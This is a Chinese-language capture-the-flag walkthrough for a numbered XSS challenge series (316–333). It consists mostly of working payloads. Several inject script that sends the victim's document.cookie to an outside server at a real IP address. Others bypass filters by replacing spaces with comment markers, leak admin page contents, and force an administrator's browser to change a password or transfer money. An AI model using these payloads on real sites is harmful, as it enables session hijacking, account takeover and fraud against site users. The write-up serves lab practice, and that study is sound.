目录
在自己的vps上搞
集成环境 安装小皮面板 卸载的话 可以先进入 xp
316?
payload:
<script>window.location.href='http://82.156.168.16/1.php?1='+document.cookie;</script>
317
<body οnlοad="window.location.href='http://82.156.168.16/1.php?1='+document.cookie" > </body>
318
<body οnlοad="window.location.href='http://82.156.168.16/1.php?1='+document.cookie"> </body>
319
317-319 分别过滤了 script img 等 上面payload通杀
320
过滤了空格
body/**/οnlοad="window.location.href='http://82.156.168.16/1.php?1='+document.cookie"</body>
321
用‘/’ 或者‘/**/’代替空格
322
继续通杀
323-326
通杀!!!
327
我们要拿到管理员的cookie 收件人要是admin
body/**/οnlοad="window.location.href='http://82.156.168.16/1.php?1='+document.cookie"</body> 不行
返璞归真
<script>window.location.href='http://82.156.168.16/1.php?1='+document.cookie;</script>
328
?
要管理员才能查看用户账号密码,我们可以在注册的时候写入xss 等管理员访问的时候拿到管理员cookie
抓包伪造管理员的cookie
?
329
cookie发送给攻击者之前就失效了,盗用cookie不行,那就直接获取管理员页面的东东
<script>window.open('http://82.156.168.16/1.php?1='+document.getElementsByClassName('layui-table-cell laytable-cell-1-0-1')[1].innerHTML)</script>
330
发现多了一个修改密码页面,抓包 发现有api接口
让管理员本机127.0.0.1修改密码
<script>window.location.href='http://127.0.0.1/api/change.php?p=1234'</script>
然后管理员登录得到flag
331
post方式修改密码 发现.ajax
<script>$.ajax({url:'api/change.php',type:'post',data:{p:'123'}});</script>
332
让收款人转账为负数,自己就无数的钱了
333
非预期解:自己给自己转账 加倍增长,预测15此转即可
预期解:
先给自己转1元 抓包看参数。
然后让管理员转钱
<script>$.ajax({url:'api/amount.php',type:'post',data:{u:'123',a:'16116'}});</script>